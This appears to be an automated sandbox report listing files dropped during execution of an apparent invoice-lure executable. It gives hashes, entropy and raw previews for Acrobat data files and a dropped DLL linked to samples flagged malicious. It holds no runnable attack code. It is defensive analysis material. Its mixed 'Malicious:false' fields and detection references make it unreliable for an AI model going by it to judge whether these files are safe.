                                                                            SHA1:05D1FD8D42423EB2A056438759A23ABA72265AD1
                                                                            SHA-256:6907ACC3F8C0C04EA5C9DEFFC4224E24B76A7C0E7CA946311FD7D9D8116AA215
                                                                            SHA-512:335DA67EDAF34B6481197344CE9F06D50EB12601B2AD1D209A38FFFBB5C12CFB7AA89CAB9940D064A8FED508F5FDC8BBA54B075F0FF9BEB6E714911A0BAF69D2
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):287
                                                                            Entropy (8bit):5.275572745613981
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJf21rPeUkwRe9:YvXKX9drEZc0v2G+16Ukee9
                                                                            MD5:2C24C28097FC38C7B6C6654E14D1A6BE
                                                                            SHA1:D4609348FCEBC09FA8C0C11D60BF8142E15FF649
                                                                            SHA-256:CAD51D6348EAAA148A54A6C1926F106038540B9927DDCDCD4FC6E2836EA4067C
                                                                            SHA-512:CCF3F72EB84D6556CE31510ED82B6DDFE0B5028B065372F9E19B4BF5FFE67BDA0868A81A055C356028E0919DA9E59049064FEA5E54FD58CA8D1C9008DAF7DF7E
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1250
                                                                            Entropy (8bit):5.715849560792744
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzvTamXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3H6w:YvjrBgn5drpTB5OJhr9Q9FJ9H3
                                                                            MD5:A720BB898C0D59DA44E99A28B80ABB57
                                                                            SHA1:21228D703535273259D71D6B8A5C3ACCAC2360FF
                                                                            SHA-256:9261494E0295FEFB48025FD89D1BEC6143EF4CCAD9EB9F2CB861F52378D9E6C0
                                                                            SHA-512:3D8D9D632FBD88F9667CA2724EFD981B199D3D15F1D2D73AAA7F9471680EA3AE2CE848F687EDB1F7D13584207BBF659298222C2AEE722564FE365BA5B2744A6D
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):286
                                                                            Entropy (8bit):5.250873045342247
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfshHHrPeUkwRe9:YvXKX9drEZc0v2GUUUkee9
                                                                            MD5:A79981F201FD27A47C7D0A830078BCDC
                                                                            SHA1:25C59BBEA21E9242CF78F8C2E08218371F921DBC
                                                                            SHA-256:C64D76CBFEF23BB04B617F47D809A5079C31A95E46287C78ED4EE5EFD52FC1E9
                                                                            SHA-512:A125FD5FC6FB2D71C0CF576EA580E29FEA9006F2628DBE373C51FDC2406954FD0FFD5F659F2D100BA9B026BDE1668776B72C33FDE73537A3D49325FE67972323
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):782
                                                                            Entropy (8bit):5.357579607989155
                                                                            Encrypted:false
                                                                            SSDEEP:12:YvXKX9drEZc0v2GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWRW1:Yv6XjrEzvQ168CgEXX5kcIfANh6w
                                                                            MD5:AE7067E0369DA0FC7AEB1257B7016A22
                                                                            SHA1:C2F0EDDF4FE4E05FA37B0291210A4EB15CC23C66
                                                                            SHA-256:6A332DCDD7F498618B14E99C03B0E5CB2DAFC40C1EF4063E85E525DBB5656D1E
                                                                            SHA-512:0A90828468A08132379E5312F16F6163A282DA08C6A018A772AA587313068E737AC2B2659A0DADFFD6320489FBBC23A2F766E26E637D08DCE5BB8711335563A3
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1706008698598}}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):0.8112781244591328
                                                                            Encrypted:false
                                                                            SSDEEP:3:e:e
                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                            Malicious:false
                                                                            Preview:....
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):2818
                                                                            Entropy (8bit):5.127436694158643
                                                                            Encrypted:false
                                                                            SSDEEP:24:YsqBwq0uxaDayBYRvMgmxFaCFMIlKd0mA4zVB4Yd4QW7CjMSj0SFQ9y0F2IAv2Lm:YCY1mQ4R145uYXMk09dAviU9Nkx98
                                                                            MD5:DDC5FAD41CF2DA20F2CD11395D0548E8
                                                                            SHA1:7356665EBB098262FAF8DD68B1DF06DDD36CF335
                                                                            SHA-256:6097BA5716B3ABD570DA3C15D8AB6BA86747B3E0EA7FD68642562EF794163527
                                                                            SHA-512:5A079BF24B9F19B6FDFE09E150A7FE07A3CB09C5CF992AB9E575994D5BD1CD732C7BF9ED8016ACEC2456FC75F25FE14149B6B55EA8C12E491850991CEC30FF35
                                                                            Malicious:false
                                                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2766787c734b0355c5c3dd7dd276438a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"148a230e3dff4ce102810dc14152ce3e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1706008698000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f6404e55972a67397fc4cdfd3c68e41d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706008698000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5084a35e095cd4116d7c5d11ef7b28e8","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1706008698000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"bc498d852bfb7e7b970a86b49a8cd656","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1706008698000},{"id":"Edit_InApp_Aug2020","info":{"dg":"b2597987459352b5acbee1fad0fa2cff","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                            Category:dropped
                                                                            Size (bytes):12288
                                                                            Entropy (8bit):1.187069151370841
                                                                            Encrypted:false
                                                                            SSDEEP:48:TGufl2GL7msEHUUUUUUUUmSvR9H9vxFGiDIAEkGVvpc:lNVmswUUUUUUUUm+FGSItA
                                                                            MD5:948E40B8FF3C0C6CD247274DEAE70C59
                                                                            SHA1:B05A699952645335FA3C4A8CCFB80007C2F0EE16
                                                                            SHA-256:BE186B503810B03A14942AB5C0F56F0938592A4E56FCD1A7ED8F7B9F11B91866
                                                                            SHA-512:2A49D2187DCB9AE2154B629062FFAFCAC66EE2C8B71B903DD62A8AED6BFB2AB96100662152B83BBF6F1FEE0F17678948EC7FED26F37388ECC2E4A1A74F6D9C61
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:SQLite Rollback Journal
                                                                            Category:dropped
                                                                            Size (bytes):8720
                                                                            Entropy (8bit):1.6041849445913965
                                                                            Encrypted:false
                                                                            SSDEEP:48:7MwbKUUUUUUUUUUkvR9H9vxFGiDIAEkGVvcqFl2GL7msz:7gUUUUUUUUUU0FGSIteKVmsz
                                                                            MD5:457D6C179B1F46D95BF0F49AA3BA545C
                                                                            SHA1:EA61239924BDB8B1BF215E44A5A40E6A675EF193
                                                                            SHA-256:B7D7BCF014D34E0E25ADEE0DBCA3950B974B706C22F89E6C70F58BE1AE14F959
                                                                            SHA-512:2FC0407B162A2B87F8B088EAB01221ABCAE4EB452967DC50CF6285CF5A5BAB7B918D6508E3DE648DD91F4035B08737F5D1E334AC08D3EB8E6F3A85D32FB84FE3
                                                                            Malicious:false
                                                                            Preview:.... .c.....87........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):66726
                                                                            Entropy (8bit):5.392739213842091
                                                                            Encrypted:false
                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEgOhP2YblS81v17heApUsOXEPeYyu:6a6TZ44ADEOhPhblS81vahBK
                                                                            MD5:3E57A19237714CD662B6E6E5EF9EF5F5
                                                                            SHA1:7586ADBBA2695B96E5E5C7A9BC5A16BC519755CF
                                                                            SHA-256:7D1A7602AE02EC09DF354F701089E1C213D1F7A663F16AB51F599DA6937CEDB6
                                                                            SHA-512:C3089367989CB30159D9DEE4D172287379B4767E184D8CEDFFEBB7FD825916E5DCDC7B90E612EC6F3B367CA7A94E9EF7AF266F64D01B6F24FDE8661E7692DC0B
                                                                            Malicious:false
                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):246
                                                                            Entropy (8bit):3.505069684106714
                                                                            Encrypted:false
                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rpa3GlGll:Qw946cPbiOxDlbYnuRK0IGlGn
                                                                            MD5:0A5ED263E52032380525899C0D784885
                                                                            SHA1:387775C19E1524FACC0881E54141FA206671C716
                                                                            SHA-256:61BB219BC3E9426DE667600AADF1EF4322561CC65F0DA5B718B4D3CA61652C2B
                                                                            SHA-512:F3DCDC6F5C7E5CDF47F454EFA40EDF7CFBBDAF83723E46D58B2CA5CF160D44856091017173CC67A47C9C16564656C4D2A49D57868423DF9323603E345549EE9F
                                                                            Malicious:false
                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.0.1./.2.0.2.4. . .1.2.:.1.8.:.1.8. .=.=.=.....
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):756576
                                                                            Entropy (8bit):6.616629532136608
                                                                            Encrypted:false
                                                                            SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                                                                            MD5:B158D8D605571EA47A238DF5AB43DFAA
                                                                            SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                                                                            SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                                                                            SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: 1tuL3R5svT.exe, Detection: malicious, Browse
                                                                            • Filename: 1tuL3R5svT.exe, Detection: malicious, Browse
                                                                            • Filename: Setup.msi, Detection: malicious, Browse
                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):756576
                                                                            Entropy (8bit):6.616629532136608
                                                                            Encrypted:false
                                                                            SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                                                                            MD5:B158D8D605571EA47A238DF5AB43DFAA
                                                                            SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                                                                            SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                                                                            SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: Fatturation110124.exe, Detection: malicious, Browse
                                                                            • Filename: 1tuL3R5svT.exe, Detection: malicious, Browse
                                                                            • Filename: 1tuL3R5svT.exe, Detection: malicious, Browse
                                                                            • Filename: Setup.msi, Detection: malicious, Browse
                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):756576
                                                                            Entropy (8bit):6.616629532136608
                                                                            Encrypted:false
                                                                            SSDEEP:12288:+0WEHqIw3Gy6hFWBZGNTph0lhSMXle1Gf5PsTcuvX:+xDf3z6hFWHah0lhSMXlKW547vX
                                                                            MD5:B158D8D605571EA47A238DF5AB43DFAA
                                                                            SHA1:BB91AE1F2F7142B9099E3CC285F4F5B84DE568E4
                                                                            SHA-256:CA763693CC25D316F14A9EBAD80EBF00590329550C45ADB7E5205486533C2504
                                                                            SHA-512:56AEF59C198ACF2FCD0D95EA6E32CE1C706E5098A0800FEFF13DDB427BFB4D538DE1C415A5CB5496B09A5825155E3ABB1C13C8C37DC31549604BD4D63CB70591
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......+.ZRo.4.o.4.o.4...7.d.4...1...4.iV0.}.4.iV7.x.4.iV1.!.4...0.v.4...2.n.4...5.F.4.o.5...4..V=...4..V4.n.4..V..n.4.o..n.4..V6.n.4.Richo.4.........................PE..L.....e.........."!...&............................................................bL....@A........................ ..........,....................N..`=.......x..p...p...............................@...............x............................text...j........................... ..`.rdata..H...........................@..@.data....%..........................@....rsrc...............................@..@.reloc...x.......z..................@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:ASCII text, with very long lines (393)
                                                                            Category:dropped
                                                                            Size (bytes):16525
                                                                            Entropy (8bit):5.345946398610936
                                                                            Encrypted:false
                                                                            SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                            MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                            SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                            SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                            SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                            Malicious:false
                                                                            Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):15114
                                                                            Entropy (8bit):5.349964663512601
                                                                            Encrypted:false
                                                                            SSDEEP:384:UizhlhQhNhnhehvh2hdh7hGhEsfs5OsEsvXwXM626yYVYJtctftX1/iU+UApKGTE:U+nO/VMdkf98CQEO5cgcPBkcq9fadTEH
                                                                            MD5:A7551F2B29E55D63E5FAEC1206F8E4FF
                                                                            SHA1:AE380EE3FA3F901C467A87628710FCCC284D4872
                                                                            SHA-256:67CCE11B371C99F701BB1CF0FE2943679654E5E31D3DED06ED434D035942A7C9
                                                                            SHA-512:D030EA6C081B444077179227D99A1B542709C76F6349F963DD07295D35149DE6F6F6EDB4B5540ED6B8D1A79158CF2DF7216A856840F0E43E525C13C6F2F290AD
                                                                            Malicious:false
                                                                            Preview:SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:588+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d2af7e55-e277-436e-80ac-967d712becdc.1706008692588 Timestamp=2024-01-23T12:18:12:590+0100 ThreadID=8040 Component=ngl-lib_NglAppLib Description="SetConf
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):29752
                                                                            Entropy (8bit):5.386753438347909
                                                                            Encrypted:false
                                                                            SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rE:A
                                                                            MD5:9C08E7565A5DBDC7E30CD9D99CE3E4CD
                                                                            SHA1:6C3121CACB696B01F3DC5E092D5DDD6E6E6E836E
                                                                            SHA-256:60587FB87F40B87E05784314CB938CB1D9543C4F2C6C603AEA23290279FCA4DA
                                                                            SHA-512:0A7728328DC8E4CFF1C73E0878585364D4258F0B5A5D250C07FB4B524F95A475D6932A4D0699E64FD5108EAE7D304105AD936374C3E340167F3C0F021E39731A
                                                                            Malicious:false
                                                                            Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                            Category:dropped
                                                                            Size (bytes):1407294
                                                                            Entropy (8bit):7.97605879016224
                                                                            Encrypted:false
                                                                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                            Malicious:false
                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
